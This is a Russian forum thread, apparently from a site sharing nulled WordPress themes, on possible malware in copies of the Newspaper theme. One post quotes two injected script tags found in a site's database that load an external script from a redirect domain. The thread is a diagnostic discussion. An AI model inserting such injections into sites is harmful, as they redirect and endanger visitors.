EDIKOFFF
Местный житель
- Регистрация
- 21 Мар 2009
- Сообщения
- 258
- Реакции
- 21
Антивирус Bkav Результат VEXB627.Webshell
в файле td_view_system_status.php
Последнее редактирование:
-
DONATE to NULLED!
Вы можете помочь Форуму и команде, поддержать финансово. starwanderer - модератор этого раздела будет Вам благодарен!
Поиск Ищу тему Newspaper последней версии
- Автор темы ego
- Дата начала
в файле td_view_system_status.php
yojimoto
Постоялец
- Регистрация
- 15 Окт 2016
- Сообщения
- 88
- Реакции
- 120
8.1.2
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
Sergiop
Постоялец
- Регистрация
- 13 Авг 2013
- Сообщения
- 90
- Реакции
- 19
SHA256: 542b4632fff59bd0b6e280a468a164d129f6448b428b3eda6ea651891ab04db9
Для просмотра ссылки Войди
Интересно, тема когда вышла?? Или кто до выхода тестил..virustotal.com написал(а):
Шутка, скорее всего данный файл из предыдущей темы тестили.
Я так понимаю это оригинальная тема?
Хэш SHA256 и соответственно результат тот же, что и у файла из нуленной темы.
Выходит, что если и шелл, то от производителя. Да и шелл теперь, довольно широко-размытое понятие..
Последнее редактирование:
yojimoto
Постоялец
- Регистрация
- 15 Окт 2016
- Сообщения
- 88
- Реакции
- 120
она не с themeforest скачана, с другого сайта
Sergiop
Постоялец
- Регистрация
- 13 Авг 2013
- Сообщения
- 90
- Реакции
- 19
Выходит, что начиная как минимум с темы 8.1.1, есть некая вероятность того, что шелл, в каком-то виде, в теме всё же присутствует..
Sergiop
Постоялец
- Регистрация
- 13 Авг 2013
- Сообщения
- 90
- Реакции
- 19
Я имел в виду, что в выложенных здесь, начиная с 8.1.1, возможен шелл, и которые, как сказал yojimoto не с офсайта, т.е. как я понял - не оригинальные.
yojimoto
Постоялец
- Регистрация
- 15 Окт 2016
- Сообщения
- 88
- Реакции
- 120
Во всяком случае "клянутся", что темы чистые)))
...We offer direct download links and 100% genuine, clean and untouched packages of Wordpress Themes and Plugins.
tsvetnoff
Постоялец
- Регистрация
- 14 Мар 2013
- Сообщения
- 30
- Реакции
- 10
У меня с этой темой Яндекс сайт заблокировал. Пишут - вредоносный код. Через раз при заходе на сайт перекидывает на какой-то левый сайт. В коде в двух местах нашел отсылку к какому-то скрипту:
но файл темы с ними найти не могу! (( Кто-нибудь сталкивался с этим? Помогите!
UPD! Нашел. Сидели в БД. Убрал, проверю теперь работу. Если у кого похожее поведение сайта имейте ввиду.
Код:
<script type='text/javascript' src='
" rel="nofollow">https://jar.trafficbetter.biz/s.js'></script>
и
<script type="text/javascript">var sc = document.createElement("script"); sc.type = "text/javascript"; sc.src = "https://jar.trafficbetter.biz/s.js"; document.head.appendChild(sc);</script><script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/мойдомен.ru\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u0435, \u0447\u0442\u043e \u0432\u044b \u043d\u0435 \u0440\u043e\u0431\u043e\u0442."}}};
/* ]]> */
</script>UPD! Нашел. Сидели в БД. Убрал, проверю теперь работу. Если у кого похожее поведение сайта имейте ввиду.
Последнее редактирование:
ezh88
Постоялец
- Регистрация
- 26 Янв 2016
- Сообщения
- 111
- Реакции
- 16
Скачал версию 8.2 отсюда:
Нормально активировалось, пока не заметил левых ссылок...
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
Нормально активировалось, пока не заметил левых ссылок...